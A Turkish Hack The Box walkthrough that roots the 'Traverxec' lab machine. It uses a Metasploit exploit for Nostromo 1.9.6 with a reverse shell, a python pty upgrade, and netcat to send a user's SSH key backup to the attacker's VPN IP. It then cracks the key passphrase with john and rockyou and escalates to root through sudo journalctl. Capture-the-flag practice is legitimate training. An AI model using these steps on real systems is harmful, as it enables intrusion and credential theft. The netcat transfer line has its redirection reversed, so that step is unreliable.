Merhabalar bu yazımda Hackthebox Traversec Çözümü sizler için anlatacağım.
- Makine İsmi: TraverSec
- Makine Zorluğu: Başlangıç
1- Nmap ile taramaya başladım. 2 portun açık olduğunu tespit ettim.
80.port içerisinde nostromo 1.9.6 olduğunu gördüm bunu not alıyorum. Daha sonra exploit araştırması yapacağım.
2- Nikto ile taramaya devam ediyorum ama işe yarar bir şey bulamadım.
Dizin taramasında da etkili bir şey bulamadım.
3- İnternetten araştırdığımda Nostromo 1.9.6 sürümünde açık olduğunu tespit ettim. Direkt olarak metasploit açtım ve içerisinde arattığımda 1 tane exploit buldum.
Direkt olarak buradan makine içerisine geçiş yapabiliriz.
4- Show options yazarak gerekli yerleri doldurmamız gerekiyor. Bizden Rhosts, Lhost, Lport yazmamızı istiyor.
5- Gerekli bilgileri doldurmaya başlıyoruz;
- set rhosts 10.10.10.165
- set lhost kendi vpn ip adresiniz
- set lport 9001
- set ForceExploit true
- run
Yazarak exploiti çalıştırıyoruz.
İlginizi çekebilecek yazımız: Hackthebox Backdoor Makine Çözümü
6- Run dedik ve otomatik olarak çalışmaya başladı. Shell yazarak aktif terminal açmaya başlıyoruz.
python -c ‘import pty;pty.spawn(“/bin/bash”)’ direkt bash kabuğu açtık.
7- ncat -lvnp 9001 > sshkey.tgz yazıp devam edelim.
8- İçerisinde araştırma yaptım ama direkt olarak yetki yükseltemiyoruz.
Dizinlerin içerisine de geçiş yapmama izin vermedi ama farkettiğim dizin listeleme açıktı, tek tek dizinleri tespit ederek devam ettim ve sshkey olarak dosyaların olduğunu buldum.
Bu sshkey’in David kullanıcısının Ssh keyi buradan direkt olarak SSH üzerinden David kullanıcısına login olabiliriz.
nc kendivpnipadresiniz 9001 > /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz yazıp enter yapalım.
9- Direkt olarak dizinimize dosya indi. Sırasıyla;
- tar -xvf sshkey.tgz ile dosyayı çıkardık
- cd home/david/.ssh/
- mv id_rsa /root/Masaüstü
- Direkt Masaüstüne id_rsa taşımış olduk.
10- Sırasıyla;
- python3 ssh2john.py id_rsa > yenihash
- john –wordlist=/usr/share/wordlists/rockyou.txt yenihash.txt
- SSH Key’in hunter olduğunu buldum.
Şimdi SSH login olmaya çalışalım.
11- chmod 400 id_rsa ile yetkiyi ayarlıyoruz.
ssh -i id_rsa [email protected] enter yaptık ve key sorduğunda hunter yaptım ve login olduk.
12- User flağını buldum. Linpeas.sh ile yetki yükseltmek için araştırma yaptım ve /bin klasörü içinde ki server-stats.sh okuduk ve aşağıda ki service sudo olarak çalıştırdığımızda direkt olarak root içerisine geçiş yapabileceğimizi tespit ettim.
13- /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service yazdım ve The End satırı geldi.
!/bin/bash yazdık ve enter yaptığımızda direkt root içerisindeyiz bayrağı bulmuş olduk.
Hackthebox Traversec Çözümü sonuna geldik. Yeni yazılarda görüşmek üzere, sağlıcakla kalın. 🙂